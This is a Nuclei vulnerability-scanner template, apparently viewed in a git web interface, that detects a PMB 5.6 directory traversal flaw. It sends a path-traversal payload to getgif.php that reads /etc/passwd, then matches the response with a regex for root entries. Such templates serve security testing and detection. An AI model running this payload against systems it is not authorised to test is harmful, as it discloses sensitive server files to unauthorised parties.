nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml

27 lines
721 B
YAML
Raw Normal View History

2021-08-16 10:44:02 +00:00
id: pmb-directory-traversal
info:
name: PMB 5.6 Directory Traversal
author: geeknik
severity: medium
2021-08-16 11:13:47 +00:00
description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure.
reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
tags: lfi
2021-08-16 10:44:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
- "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
2021-08-16 11:13:47 +00:00
2021-08-16 10:44:02 +00:00
- type: status
status:
- 200